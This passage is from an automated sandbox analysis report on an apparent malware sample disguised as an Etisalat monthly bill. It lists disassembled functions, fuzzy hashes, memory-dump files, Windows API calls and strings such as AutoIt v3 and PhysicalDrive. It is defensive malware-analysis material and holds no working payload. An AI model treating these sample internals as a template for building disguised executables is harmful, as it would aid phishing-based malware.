Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: d43fb7778c9c6da3e53c998f8de556976e5ee4da3010538eeb317d02e4b9c6a9
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: A951796160C6499BDB38452C885DFBE2BB5FB12344F18053DEA82C7682C639DE09DF5A

Function 008BCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43cdbe2a99f426c734ebb426bdec9f1985ef94ae5a220063646aa9b10210c521
Instruction ID: 047bde980ebee8999d8e0407479b3657774fff44b2b9fd73867237a9ac34710d
Opcode Fuzzy Hash: 43cdbe2a99f426c734ebb426bdec9f1985ef94ae5a220063646aa9b10210c521
Instruction Fuzzy Hash: 28321631A0411D8BDF28CF39C6A06BE7BA1FB45314F28856AD68ACB391D334DE85DB40

Function 008A7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab3707e1e929dd0da6c8788c30e72cd5d28a0af66aefe9d9d451a959241b28f3
Instruction ID: 3ce751f2e202965c49b6a17013181307200dcfbb1add15bfde08a4fefdfd12bb
Opcode Fuzzy Hash: ab3707e1e929dd0da6c8788c30e72cd5d28a0af66aefe9d9d451a959241b28f3
Instruction Fuzzy Hash: AD22D0B0A04609DFEF14CF69C881AAEB3B5FF46318F144129E812E7691EB35ED11DB61

Function 008A91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb2602a7fbaa1ee2b6139059689c83bf40275ef0d9ad9cdfe565734221fe7c73
Instruction ID: 15da6d9f6c12bbe7d447b10d8896e96208d14db4414af6867ac3332eaaa1ad29
Opcode Fuzzy Hash: bb2602a7fbaa1ee2b6139059689c83bf40275ef0d9ad9cdfe565734221fe7c73
Instruction Fuzzy Hash: 3E02C5B0A00119EFDF04DF69D881AAEB7B1FF45304F608169E856DB391EB31EA10CB91

Function 008C1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 43b25562632b2dd4430c7a70fbe3b90345f6a69f8e525bb0297313c24033c393
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: FD9157722080A349DF29463985B8A7DFFF1EA533A1719079DE4F3CA1C6EE34D568D620

Function 008C19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: c9ab22138bc432c15e7c7f8d1cef37ec41e2a686392ef6727d8372217f8d878c
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 2D9135722090A349DF69427985BC93DFEF1AA533B5319079DD4F2CA1C2FD34C9699A20

Function 008C7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a28044dc8a326d704bfca54066d41e794ed57077e44100218b90f0be6c82404
Instruction ID: aa86a7b12b8c6c117f806dc4b719206a1a74ad25b40dd30e97bf93e48c8ed4d7
Opcode Fuzzy Hash: 9a28044dc8a326d704bfca54066d41e794ed57077e44100218b90f0be6c82404
Instruction Fuzzy Hash: 19616771248719A6DB349A2C8995FBE23B4FF41764F10491EE942DB281DA31DE42CF16

Function 008C7CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b69a2e3618aae959998ff9a48ead1f81d88d4ea61a46793cb35964cfe4087537
Instruction ID: 7b4a63ec30be32ae800afa60f5da43673498a16d2c8083864c0f614711f5122c
Opcode Fuzzy Hash: b69a2e3618aae959998ff9a48ead1f81d88d4ea61a46793cb35964cfe4087537
Instruction Fuzzy Hash: 8B617A72248709A7DA384A2C5856FBE23B4FF42B44F10095EFA43CB289D631ED428E56

Function 008C1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: aff6b42ac07142c0fd4d4fa20b77ec3d88ec2297355063e7843ec55a0cc06931
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 8A8144725090A349DF59423985B893EFFF1FA933A131A47ADD4F2CA1C6EE34C558D620

Function 01F43640 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2025586288.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f40000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 736a1d04a8bdbefcc9d61ff301db0eaa74d236d9047d3ccfd697ec2799ac65d9
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 8E41D3B1D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40

Function 00912046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4419b22762cce407f25d499c4552a5b59fe23419c1de1eb6ff6efad1950101f5
Instruction ID: 71579a1cda0acb98ab79df22d97053d3318e56f88922e1913630f63ffa1287a9
Opcode Fuzzy Hash: 4419b22762cce407f25d499c4552a5b59fe23419c1de1eb6ff6efad1950101f5
Instruction Fuzzy Hash: 1421A5327306158BD728DF79C8226BA73E9E754310F25862EE4A7C37D1DE39A944DB80

Function 01F434D0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2025586288.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f40000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: d01f50ce01a2e7a1f2d218a9995ac414f7f86bf30e9e72599f17e0834de0bcc6
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: A4018079E00109EFCB44DF98C5909AEFBB5FB88210B208599D809A7741E731AE41DB80

Function 01F43530 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2025586288.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f40000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 9e10f7d9794f63fee461acc2369e23ddf1191a0131a054ff767658ea45c33a3b
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 26019279E01109EFCB44DF98C5909AEFBB5FB88310F208599D809A7701D731AE51DB80

Function 01F41E70 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2025586288.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f40000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00922ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00922B30
DeleteObject.GDI32(00000000), ref: 00922B43
DestroyWindow.USER32 ref: 00922B52
GetDesktopWindow.USER32 ref: 00922B6D
GetWindowRect.USER32(00000000), ref: 00922B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00922CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00922CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00922CF8
GetClientRect.USER32(00000000,?), ref: 00922D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00922D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00922D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00922D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00922D80
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00922D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00922D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00922DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00922DA8
GlobalFree.KERNEL32(00000000), ref: 00922DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00922DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0093FC38,00000000), ref: 00922DDB
GlobalFree.KERNEL32(00000000), ref: 00922DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00922E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00922E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00922E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0092303F

Strings

DISPLAY, xrefs: 00922EA2
static, xrefs: 00922D3A, 00922E91
AutoIt v3, xrefs: 00922CF2
, xrefs: 00922FC5

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 5baf9af4493687b35c5b593275ed5284498e8f509cb84701a29c1c38cedf003c
Instruction ID: 7cf30ff64a60da62a033eefa09da3c70851b2d1689825d2a950273ab816cc093
Opcode Fuzzy Hash: 5baf9af4493687b35c5b593275ed5284498e8f509cb84701a29c1c38cedf003c
Instruction Fuzzy Hash: 96028CB2910215AFDB14DFA8DC89EAE7BB9FB49314F048158F915AB2A1C734ED00DF60

Function 009370D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0093712F
GetSysColorBrush.USER32(0000000F), ref: 00937160
GetSysColor.USER32(0000000F), ref: 0093716C
SetBkColor.GDI32(?,000000FF), ref: 00937186
SelectObject.GDI32(?,?), ref: 00937195
InflateRect.USER32(?,000000FF,000000FF), ref: 009371C0
GetSysColor.USER32(00000010), ref: 009371C8
CreateSolidBrush.GDI32(00000000), ref: 009371CF
FrameRect.USER32(?,?,00000000), ref: 009371DE
DeleteObject.GDI32(00000000), ref: 009371E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00937230
FillRect.USER32(?,?,?), ref: 00937262
GetWindowLongW.USER32(?,000000F0), ref: 00937284

Part of subcall function 009373E8: GetSysColor.USER32(00000012), ref: 00937421
Part of subcall function 009373E8: SetTextColor.GDI32(?,?), ref: 00937425
Part of subcall function 009373E8: GetSysColorBrush.USER32(0000000F), ref: 0093743B
Part of subcall function 009373E8: GetSysColor.USER32(0000000F), ref: 00937446
Part of subcall function 009373E8: GetSysColor.USER32(00000011), ref: 00937463
Part of subcall function 009373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00937471
Part of subcall function 009373E8: SelectObject.GDI32(?,00000000), ref: 00937482
Part of subcall function 009373E8: SetBkColor.GDI32(?,00000000), ref: 0093748B
Part of subcall function 009373E8: SelectObject.GDI32(?,?), ref: 00937498
Part of subcall function 009373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 009374B7
Part of subcall function 009373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009374CE
Part of subcall function 009373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 009374DB

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: f3d70f323c18b7f42287bb9a03f1f2b8a742d1a0e98daf0ff44bd8bffebee9d4
Instruction ID: 6fa102e0ee423bfe366f19d7f352e4a30e6f022f64f7b772cffba2a6bc5e155a
Opcode Fuzzy Hash: f3d70f323c18b7f42287bb9a03f1f2b8a742d1a0e98daf0ff44bd8bffebee9d4
Instruction Fuzzy Hash: 65A1A0B201C701AFDB109FA0DC48E6BBBA9FB49321F100A19F962A61E1D775E944EF51

Function 008B8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 008B8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 008F6AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 008F6AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008F6F43

Part of subcall function 008B8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008B8BE8,?,00000000,?,?,?,?,008B8BBA,00000000,?), ref: 008B8FC5

SendMessageW.USER32(?,00001053), ref: 008F6F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008F6F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 008F6FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 008F6FB7

Strings

0, xrefs: 008F6DCF

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 22050a1fc0d1ada9c74f4d5a20deb3c84d223a38921816411ea8669dbbdbfe4f
Instruction ID: 7c6d6f634aa7d1f58586d4f2f0695ece57dc7a4d60d31d37c71ebcd43f20bdbc
Opcode Fuzzy Hash: 22050a1fc0d1ada9c74f4d5a20deb3c84d223a38921816411ea8669dbbdbfe4f
Instruction Fuzzy Hash: 5312AB31204209EFDB25DF28D844BB6B7A5FB44310F144269F689DB261DB31ECA2EF91

Function 00922711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0092273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0092286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 009228A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 009228B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00922900
GetClientRect.USER32(00000000,?), ref: 0092290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00922955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00922964
GetStockObject.GDI32(00000011), ref: 00922974
SelectObject.GDI32(00000000,00000000), ref: 00922978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00922988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00922991
DeleteDC.GDI32(00000000), ref: 0092299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009229C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 009229DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00922A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00922A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00922A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00922A77
GetStockObject.GDI32(00000011), ref: 00922A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00922A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00922A97

Strings

msctls_progress32, xrefs: 00922A13
DISPLAY, xrefs: 0092295A
static, xrefs: 0092294F, 00922A71
AutoIt v3, xrefs: 009228F8

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 461aa6686ee363137a55a85a9b9bbb1dfeccaec106098a772f1e814dc6b530e3
Instruction ID: ec5cceecd998c73bb60afca82fec74b6881d5d72497d6c3fc2fadcf079bd8cf7
Opcode Fuzzy Hash: 461aa6686ee363137a55a85a9b9bbb1dfeccaec106098a772f1e814dc6b530e3
Instruction Fuzzy Hash: E6B15BB2A14615BFEB14DFA8DC8AEAE7BA9EB48710F004114F915E7290D774ED40DB90

Function 00914ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00914AED
GetDriveTypeW.KERNEL32(?,0093CB68,?,\\.\,0093CC08), ref: 00914BCA
SetErrorMode.KERNEL32(00000000,0093CB68,?,\\.\,0093CC08), ref: 00914D36

Strings

SCSI, xrefs: 00914C8A
ATAPI, xrefs: 00914C91
PhysicalDrive, xrefs: 00914B76
RAMDisk, xrefs: 00914BF4
Virtual, xrefs: 00914CE5
SAS, xrefs: 00914CC9
Fibre, xrefs: 00914CAD
SATA, xrefs: 00914CD0
Network, xrefs: 00914C02
